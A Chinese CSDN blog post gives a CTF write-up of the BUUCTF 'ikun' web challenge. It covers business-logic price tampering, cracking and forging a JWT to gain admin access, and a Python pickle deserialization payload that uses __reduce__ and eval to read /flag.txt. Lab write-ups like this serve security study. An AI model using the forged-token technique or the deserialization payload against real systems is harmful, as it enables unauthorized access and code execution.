NO.3-2 [CISCN2019 华北赛区 Day1 Web2]ikun

最新推荐文章于 2023-09-05 20:38:36 发布
最新推荐文章于 2023-09-05 20:38:36 发布
阅读量177 收藏 1
点赞数
分类专栏: BUUCTF JWT pythpn安全
原文链接:https://blog.csdn.net/weixin_43345082/article/details/97817909
版权

JWT破解 Python反序列化 权限获取 flag 网络安全
关键词由CSDN通过智能技术生成
BUUCTF 同时被 3 个专栏收录
60 篇文章 0 订阅
订阅专栏
pythpn安全
4 篇文章 0 订阅
订阅专栏
JWT
1 篇文章 0 订阅
订阅专栏

当时没做出来,大佬复现了环境就做一波
题目
在这里插入图片描述
第一步提示我们要找到lv6
写个脚本找一下

import requests
url="http://web44.buuoj.cn/shop?page="

for i in range(0,2000):

	r=requests.get(url+str(i))
	if 'lv6.png' in r.text:
		print (i)
		break

跑的有点慢
找到了lv6发现买不起
在这里插入图片描述
应该是要抓包修改
改折扣

在这里插入图片描述
然后拿到了后台的地址http://web44.buuoj.cn/b1g_m4mber

在这里插入图片描述
但需要权限,这里涉及JWT破解了解JWT
 
在这里插入图片描述
先将JWT base64解码一下
 

 
在这里插入图片描述
看到username是我自己的登陆名5,这里需要改为admin
后边解码不出来因为经过了sha256,需要破解key
找了一个工具破的破解工具

在这里插入图片描述
然后伪造我们的jwt生成jwt的网站
 

 
在这里插入图片描述
好的进来了


在这里插入图片描述
在页面源码里看到了下载的路径
在这里插入图片描述
下载 

 在这里插入图片描述
打开之后找到了一个python反序列化的地方,在 admin.py
在这里插入图片描述

太菜了payload不会生成 看的大佬的
用py2跑
py3序列化pickle.dumps之后的结果和py2的不一样
怀疑是库的问题

这里用了Pickle协议的方法__reduce__(self)

 
在这里插入图片描述
这是大佬讲python魔术方法的博客

import pickle
import urllib

class payload(object):
    def __reduce__(self):
       return (eval, ("open('/flag.txt','r').read()",))

a = pickle.dumps(payload())
a = urllib.quote(a)
print a

这样就可以打印flag.txt里的内容了
将生成的payload传给become
在这里插入图片描述

拿到flag


在这里插入图片描述

nigo134
关注
专栏目录
BUUCTF-WEB-[CISCN2019 华北赛区 Day1 Web2]ikun
weixin_43345082的博客
07-30 8572
当时没做出来,大佬复现了环境就做一波 题目 第一步提示我们要找到lv6 写个脚本找一下 import requests url="http://web44.buuoj.cn/shop?page=" for i in range(0,2000): r=requests.get(url+str(i)) if 'lv6.png' in r.text: print (i) break ...
buuctf-[CISCN2019 华北赛区 Day1 Web2]ikun
qaq517384的博客
10-06 586
[CISCN2019 华北赛区 Day1 Web2]ikun 打开题目是一个kunkun和一句买到lv6的话 先注册一个登录栞栞,没有东西,应该就是要买lv6了 点击下一页url加上了?page=2 一开始循环里是url=url+str(i)然后就一直报500code,给自己一拳 lv6每页都有所以要加.png 结果是page=181 import requests url="http://93b9fe83-ed26-4bbe-b6af-b0fd164e9ab5.node4.buuoj.cn:81/sh
[BUUCTF][CISCN2019 华北赛区 Day1 Web2]ikun
Y4tacker的博客
09-01 7439
文章目录知识点JWTPICKLEWP部分第一步找到lv6第二步BURP抓包修改pickel参考文章 知识点 JWT JWT相关 JWT解密网站 JWT破解利用工具 PICKLE Pickle模块中最常用的函数为: (1)pickle.dump(obj, file, [,protocol]) 函数的功能:将obj对象序列化存入已经打开的file中。 参数讲解: obj:想要序列化的obj对象。 file:文件名称。 protocol:序
[CISCN2019 华北赛区 Day1 Web2]ikun
rev1ve的博客
09-05 322
[CISCN2019 华北赛区 Day1 Web2]ikun pickle反序列化 ,JWT加解密与密钥, js前端代码
CISCN2019_华北赛区_Day1_Web2]ikun_1通关手册
No_1_is_me的博客
11-14 2142
CISCN2019_华北赛区_Day1_Web2]ikun_1通关手册
记 [CISCN2019 华北赛区 Day1 Web2]ikun 关于python的反序列化漏洞的思考
fly夏天的博客
03-30 1745
复现平台:buuctf 这题很是复杂,我也是研究了整整一天,发出来供诸位参考参考。 打开题目,脑海里不自觉的就想到了鸡你太美,为了守护世界上最好kunkun,必须搞出这题。 打开页面,是一个类似的商城页面,提示 下面是各种等级的B站账号,显然这题是想要我们购买一个lv6的账号,随便翻卡了几页还是没有看见lv6。 我们来抓包看看 可以通过传page的值来跳到指定页...
CTFd之CISCN 华北赛区 Day1 Web2题目复现
weixin_43075257的博客
07-15 1516
知识点: 薅羊毛与逻辑漏洞 cookie伪造 python反序列化
canal.adapter-1.1.6.zip
08-31
1. **Canal组件**:Canal是一款基于数据库Binlog解析的实时数据同步工具,可以实现MySQL到其他数据库(如MongoDB、Elasticsearch、HBase等)或者应用程序(如消息队列、大数据平台)的数据实时同步。 2. **适配器...
BUUCTF ,拿下[CISCN2019 华北赛区 Day1 Web2]ikun的flag
qq_43309162的博客
03-29 292
拿下BUUCTF 题目华北赛区ikun的flag
CISCN-WEB-ikun
迷风小白
09-17 3525
知识点 薅羊毛与逻辑漏洞 cookie伪造 python反序列化 IKUN 1.拿到题目,先注册一个账号登录 2.登录进去发现存在账户余额,且根据题目提示需要购买lv6 3.这里的商品目录很多,一页一页找太麻烦了,所以可以写个脚本搜一下 import requests url = "http://acb60e5d-e45c-417d-92b0-0175588a97ab.node1.bu...
Python 实现 LSTM 和 XGBoost 组合模型来预测 Apple Inc.(AAPL)股票价格(包含详细的完整的程序
10-06
内容概要:详细演示了使用 Python 中的 LSTM 和 XGBoost 结合来创建股票价格预测模型的方法。该示例介绍了从数据提取到模型优化全过程的操作,并最终通过图形比较预测值和真实值,展示模型的有效性,有助于提高金融投资决策水平和风险管理能力。本项目的亮点之一就是它融合 LSTM 捕获时间关系的强大能力和 XGBoost 在复杂特征之间的建模优势。 适用人群:有Python编程经验的人士以及金融市场投资者和技术分析师。 使用场景及目标:应用于金融市场的投资策略规划,特别是针对需要长期监控、短期交易决策的股票,用于辅助进行市场走势判断和交易决策支持。 额外信息:此外还包括对未来工作的改进建议:加入更多金融技术指标的考量以及使用更高级机器学习模型的可能性。
2019年计算机网络专业学生实习总结(二篇).pdf
10-06
计算机试题试卷课件
222222222222222222222222222222222222222222222
10-06
222222222222222222222222222222222222222222222
2020年计算机机试和笔试01至考试题.pdf
10-06
计算机试题试卷课件
2019年计算机项目实训总结.pdf
10-06
计算机试题试卷课件
两级m-lag互联-h3c的topo
最新发布
10-06
两级m-lag互联--h3c的topo两级m-lag互联--h3c的topo两级m-lag互联--h3c的topo两级m-lag互联--h3c的topo两级m-lag互联--h3c的topo两级m-lag互联--h3c的topo两级m-lag互联--h3c的topo两级m-lag互联--h3c的topo两级m-lag互联--h3c的topo两级m-lag互联--h3c的topo两级m-lag互联--h3c的topo两级m-lag互联--h3c的topo两级m-lag互联--h3c的topo两级m-lag互联--h3c的topo两级m-lag互联--h3c的topo两级m-lag互联--h3c的topo两级m-lag互联--h3c的topo两级m-lag互联--h3c的topo两级m-lag互联--h3c的topo两级m-lag互联--h3c的topo两级m-lag互联--h3c的topo两级m-lag互联--h3c的topo两级m-lag互联--h3c的topo两级m-lag互联--h3c的topo两级m-lag互联--h3c的topo两级m-lag互联--h3c的topo两级m-la
org.apache.ibatis.binding.BindingException: Invalid bound statement (not found): com.ikun.auth.service.SysRoleService.getBaseMapper
03-08
org.apache.ibatis.binding.BindingException是MyBatis框架中的一个异常类,表示绑定错误。在你提供的错误信息中,出现了"Invalid bound statement (not found): com.ikun.auth.service.SysRoleService.getBaseMapper"这个错误信息。 这个错误通常是由于MyBatis无法找到指定的绑定语句引起的。绑定语句是指在MyBatis的Mapper文件中定义的SQL语句,用于执行数据库操作。 根据错误信息中提供的绑定语句"com.ikun.auth.service.SysRoleService.getBaseMapper"来看,可能存在以下几种原因导致该错误: 1. 绑定语句的命名错误:请确保在Mapper文件中正确定义了名为"getBaseMapper"的绑定语句,并且没有拼写错误。 2. Mapper文件未正确配置:请检查Mapper文件是否正确配置了命名空间(namespace),并且在该命名空间下定义了名为"getBaseMapper"的绑定语句。 3. Mapper接口方法未正确命名:请确保在Mapper接口中存在名为"getBaseMapper"的方法,并且使用了@Select等注解来绑定对应的SQL语句。 如果以上几点都没有问题,还可以尝试以下几个解决方法: 1. 清除缓存:MyBatis会将解析过的Mapper文件缓存起来,有时候缓存可能会导致绑定错误。可以尝试清除缓存,重新加载Mapper文件。 2. 检查Mapper扫描路径:如果使用了MyBatis的自动扫描功能,确保Mapper接口所在的包路径在扫描范围内。 3. 检查依赖版本:如果使用了MyBatis的相关依赖库,确保版本兼容性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值